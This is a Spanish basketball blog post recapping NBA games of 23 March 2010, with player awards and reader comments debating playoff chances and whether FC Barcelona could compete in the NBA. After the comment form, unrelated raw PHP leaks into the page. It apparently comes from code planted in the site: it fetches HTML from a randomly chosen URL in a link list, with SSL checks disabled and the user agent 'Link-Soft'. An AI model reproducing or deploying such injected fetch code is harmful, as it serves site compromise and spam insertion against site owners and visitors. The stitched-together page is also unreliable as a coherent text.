La Crónica (23/03/2010)

24 de March de 2010 por TheDeerHunter

La de anoche era a priori una jornada ligera, con sólo cuatro partidos y varios equipos de la zona baja de la liga involucrados. No fue tanto así. Los Knicks se cargaron nada menos que a los Nuggets, demostrando un estado de forma casi inaudito. Al fantástico partido de Melo y Billups contestaron los Knicks con un Lee dominante bajo aros y un Gallinari demoledor, además de la siempre inestimable ayuda de Al Harrington.

Cuando parece ser cierto que la posibilidad de LeBron se disipa para los Knicks ahora suena casi cómico el nuevo rumor de Carmelo Anthony para 2011. ¿Otro añito más de reconstrucción quizás? Si han apostado tan fuerte por Gallinari, ¿cómo es que muchos de los rumores giren en torno a la incorporación de un alero estrella? Todo parece completamente absurdo. Probablemente sea simplemente humo para un proyecto que sigue siendo una incógnita.

Tampoco lo pasaron nada bien los Bobcats en Washington. Un partido bastante lamentable en cuanto a nivel ofensivo pero emocionante que se resolvió en la prórroga. En ella Charlotte impuso galones y también un buen saco de rebotes de diferencia. El mejor Gerald Wallace, con 17 puntos… pero 19 rebotes el muy animal.

Algunos problemas más de la cuenta tuvo Dallas para aprovechar la derrota de Denver. Dirk fue expulsado en un pique bastante exagerado que tuvo con Gooden. El alemán iba para partido antológico, con 18 puntos en 19 minutos de juego. Luego los Clippers se impusieron por dentro y por momentos parecía que iban a ser capaces de hacer saltar la banca pero Jason Kidd acudió al rescate tomando las riendas del juego ofensivo. Haywood aguantó como pudo, tras haberle sido arrebatada la titularidad por un inoperante Dampier. Decisión bastante estrambótica por parte de Carlisle.

Finalmente los Pacers no dieron opciones a Detroit. Otra vez Granger, esta vez bien acompañado por Brandon Rush. Los Pistons tan horripilantes como durante casi toda la campaña. Para lo que se juegan ya hemos hablado demasiado de ellos.

PREMIOS

MVP: 37 años y aún tiene fuerzas no sólo para jugar a baloncesto sinó para alzarse con más un MVP de la jornada. Jason Kidd lideró a los Mavs a la victoria con 26 puntos, 12 asistencias y 6 rebotes. Danny Granger saboreó las mieles del triunfo gracias, en parte, a sus 32 puntos y 6 rebotes y Gerald Wallace capturó nada menos que 19 rebotes en la victoria de los Bobcats.

Rookie: Toney Douglas continúa sorprendiendo a propios y extraños ofreciéndonos un buen nivel en los últimos partidos. Los 16 puntos y 7 asistencias de ayer son sólo una muestra.

Sorpresa: Que levante la mano el que tenía esperanzas puestas en Brandon Rush. En el partido de ayer nos ofreció algo de lo que esperábamos con 20 puntos y 4 rebotes. Por otro lado no podemos sinó alegrarnos de que un jugador como Shaun Livingstone continúe en la brecha y haciéndolo relativamente bien. Con lo que ha luchado, los 9 puntos y 6 asistencias de anoche nos saben a gloria.

Decepción: Cuando parecía llegar el momento de Andray Blatche, él mismo se ha tirado piedras sobre su propio tejado. Flip Saunders le sentó después de los 8 primeros minutos por negarse a acercarse a la banda a escuchar unas indicaciones encaradas a mejorar su defensa. Para jugar a esto hace falta cabeza además de cuerpo.

Esfuerzo en vano: A toro pasado no creo que la elección de Drew Gooden con el número 4 del draft de 2002 fuera muy acertada pero de vez en cuando se le escapan grandes partidos. Anoche consiguió 29 puntos y capturó 20 rebotes pero los Clippers perdieron una vez más.

Comenta

14 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Da igual quien juegue de pívot en Clippers que se hincha a coger rebotes y engordar sus números. En toda su carrera deportiva Gooden nunca habia promediado 9,7 rebotes. Camby de promediar 12,1 en LAC ahora se queda en 9,8 en Portland.

      Citar

  2. Love Denise dice:
    #2

    Sigo pensando que los Bucks pueden dar un susto pero que muy grande a los Lakers en unas hipotéticas finales del Oeste. Y eso que los llegados desde Washington no han alcanzado su mejor nivel, si se adaptan mejor al equipo….
    No me esperaba el buen rendimiento de Kidd este año, y Beaubois y Barea me parecen dos muy buenos jugadores de banquillo para un equipo ganador.

      Citar

  3. Love Denise dice:
    #3

    joer, quería decir los Mavs NO los Bucks (que de tanto hablar de ellos, ya no me los puedo quitar de la cabeza)

      Citar

  4. Rompe dice:
    #4

    Pues sí, y los Nuggets no los descartaría del todo, porque como Melo y Billups tengan el día, a nada que aporten los demás a ver quién los para! Parece más emocionante el Oeste que el este, que parece cosa de dos…

      Citar

  5. Love Denise dice:
    #5

    y cuidadin si bynum no jugase, que la probabilidad de una sorpresita en play-offs se multiplicaría, creo que es un jugador que cuando juega no es tan decisivo como otros, pero cuando no lo hace se le echa en falta, a pesar del rendimiento que pueda dar Pau de 5.

      Citar

  6. sergio dice:
    #6

    Los Nuggets pueden dar una pequeña sorpresa en semifinales eliminando a Mavs, pueden darla en las Finales de Conferencia supuestamente ante los Lakers (una sorpresa mas grande)… pero dar tres sorpresas seguidas me pareceria exceso de fe.

      Citar

  7. sayim dice:
    #7

    Siempre y cuando Utah no se haga con la segunda o tercera posicion, algo que yo no descartaría… De hecho, no se por que, pero los veo tan candidatos como Nuggets o Mavs a final de conferencia

      Citar

  8. kantonyo dice:
    #8

    Por cierto, se están disputando los cuartos de final de la Euroliga, a lo mejor estaría bien que alguien que este puesto en el tema se atreva a analizarnos esta competición. A mi no me apasiona mucho el baloncesto europeo, sólo en partidos clave como mucho. Pero por ejemplo hace tiempo vengo siguiendo a Jan Vasely, alapívot checho del Partizan, ayer ayudó a su equipo a dar la sorpresa en Tel-aviv.

      Citar

  9. Txusma dice:
    #9

    Eso, eso. Análisis de Euroliga dsd el prima NBA. Promero que a veces desconozco demasiado el basquet europeo aunque me declaro admirador del actual Barça, una máquina de jugar al baloncesto.

      Citar

  10. Rompe dice:
    #10

    Qué tal lo haría el actual Barça en la NBA, por ejemplo, en la conferencia Este? Igual es demasiado PO pero, al nivel de Pacers, Knicks…?

      Citar

  11. Love Denise dice:
    #11

    en primer lugar, habría que ver como un equipo europeo, en este caso el Barça, aguantaría 82 partidos en 6 meses. Suponiendo que este ritmo de partidos tan alto lo llevasen bien, pienso que en el Este podría estar luchando por la octava plaza con Toronto. En el oeste, estarían hundidos luchando con los Wolves por no ser últimos.
    Siempre he pensado que los jugadores en equipos europeos son más sacrificados en defensa y buscan más lo colectivo que lo individual, éste hecho podría hacer que el Barça superase a equipos tipo Pacers, Knicks, los actuales Pistons…..

      Citar

  12. LEmontus dice:
    #12

    En mi opinión el barsa en ambas conferencias no tendría nada que hacer ni mucho menos pelear por Po con toronto. Además del tema de los 82 partidos, la verdadera clave del barsa es Vazquez(Sobre todo por los rebotes ofensivos en la acb es imparable) que en la nba creo que cualquier pivot se lo comería( Hibbert,Big ben,Lee…). Ademas físicamente no se impondría tanto como lo hace en europa además de vazquez pete mickeal sería uno más én la nba(que es probablemente el mejor jugador de este equipo) luego estaría navarro que no sería un mal escolta anotador y por último ricky que para mi es una incógnita y no tengo ni idea de lo que hará en la nba.Luego tendría un banquillo malo con jugadores interesantes como lakovic(que no se como le iría con el triple nba) y N dong. Trías salas grimau barton basile no servirían de mucho.

    Si estuvieran en la nba los daría a un nivel de Nets. Aunque claro no puede saberse con seguridad que Vazquez no rindiera a un nivel parecido al que lo hace aquí y que ricky la liara. Lo de que Pete Mickeal no rendiría como lo hace en europa si está bastante claro. En este caso seguiría dandolo debajo de pistons o pacers.

      Citar

  13. Love Denise dice:
    #13

    ya, la calidad de Pistons o pacers puede ser superior, pero quizás el Barça podría compensarlo con una mayor capacidad de sacrificio de sus jugadores. Obviamente no sé que podría pasar, simplemente habría que verlo.
    Sí quizás me pasé con lo de luchar por Play-offs, pero creo que podría llegar a más de 20 victorias con relativa comodidad, es decir, no serían unos Nets. El perímetro lo veo bastante bueno, me encanta Mickeal, y no entiendo cómo este tío no está en la NBA habiendo tanto paquete purulando por algunos equipos. La pintura del barça para la NBA sí sería bastante floja defensivamente.

      Citar

  14. couxe dice:
    #14

    Es cierto que es muy complicado hacer comparaciones entre competiciones tan diferentes…
    El Barça en la nba tendría claras desventajas como el calendario, el no jugar bajo normas fiba, los arbitrajes y una inferioridad física contra la mayoría de equipos…
    Por otro lado tendría ventajas como una gran rotación y un trabajo táctico, tanto defensivo como ofensivo, que estaría a añós luz de la mayoría de equipos… de hecho diría que defender así, y sin utilizar marrullerías es algo desconocido en la nba…
    Así que viéndolos jugar, y la implicación e intensidad con la que lo hacen, creo que en la conferencia este se codearían con cualquier equipo de los que están por debajo de Atlanta, y en el oeste estarían por encima de los 4 últimos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>